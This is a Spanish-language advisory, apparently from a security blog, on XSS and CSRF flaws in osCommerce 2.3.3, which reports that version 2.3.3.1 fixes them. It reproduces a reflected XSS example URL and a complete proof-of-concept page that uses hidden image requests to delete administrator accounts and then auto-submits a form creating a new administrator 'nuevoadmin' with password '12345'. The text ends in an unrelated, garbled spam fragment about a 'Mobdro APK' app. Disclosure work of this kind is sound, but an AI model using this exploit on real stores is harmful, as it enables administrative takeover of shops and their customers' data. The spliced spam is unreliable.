Se han publicado dos vulnerabilidades que afectan a osCommerce y podrían permitir llevar a cabo ataques de cross-site scripting (XSS) y cross-siterequest forgery (XSRF) para obtener un usuario administrador del sitio.
osCommerce es una aplicación web de comercio electrónico desarrollada en PHP por Harald Ponce de Leon bajo licencia GPL. osCommerce es muy utilizado por las empresa para crear una tienda virtual online.
Chris Wood ha publicado 2 vulnerabilidades que afectan a osCommerce.
Son las siguientes:
- un error de falta de comprobación del parámetro de entrada «products_id» en la página «product_info.php» antes de ser devuelto al usuario podría permitir a un atacante remoto llevar a cabo ataques XSS (cross-site scripting) y ejecutar código HTML y javascript arbitrario en el navegador de un usuario en el contexto de un sitio afectado.
http:///product_info.php?products_id=4alert(‘Vulnerabilidad XSS’);
- un error de falta de validación del origen de las peticiones HTTP en la página «administrators.php» del módulo de administración podría permitir a un atacante remoto realizar ataques CSRF (cross-site request forgery) y realizar acciones como crear o eliminar usuarios.
Chris Wood ha elaborado una prueba de concepto para demostrar estas vulnerabilidades y mediante la cual se engañaría a un usuario administrador que está viendo los usuarios que visitan el sitio web («whos_online.php«) para que se ejecute un script remoto que elimine los 10 primeros usuarios del sitio y cree un nuevo usuario administrador «nuevoadmin» con contraseña «12345«.
El primer paso es crear la siguiente página web y alojarla en un servidor:
<html>
<head>
</head>
<body>
<?php
$targetSite = $_SERVER[‘HTTP_REFERER’];
$targetSite = str_replace(«whos_online.php», «», $targetSite);
?>
<?php
for ($i=1; $i<=10; $i++)
{
echo ‘<img style=«height; 1px; display: none;«src=«‘.$targetSite.’administrators.php?aID=’.$i.’&action=deleteconfirm» />‘;
}
?>
<?php
echo ‘<div style=«display: none;«><form action=«‘.$targetSite.’login.php?action=create» method=«post»>‘;
?>
<input type=«text» value=«nuevoadmin» name=«username» />
<input type=«text» value=«12345» name=«password» />
<input type=«submit» id=«submit» value=«submit» />
</form></div>
<script>setTimeout(function(){document.getElementById(‘submit’).click();},5000);</script>
</body>
</html>
Y posteriormente hacer uso de la primera vulnerabilidad para inyectar el anterior script remoto:
Las vulnerabilidades han sido confirmada en osCommerce 2.3.3 aunque versiones anteriores también podrían estar afectadas. A partir de la versión 2.3.3.1 se encuentran solventadas.
Más información:
osCommerce v2.3.3 Admin Takeover Exploit
Juan José Ruiz
Among the best features of Mobdro APK application, one thing that could stand out is that the application will completely look the whole crawled internet to be mobdro app We motivate you to please go on reading this web page, which will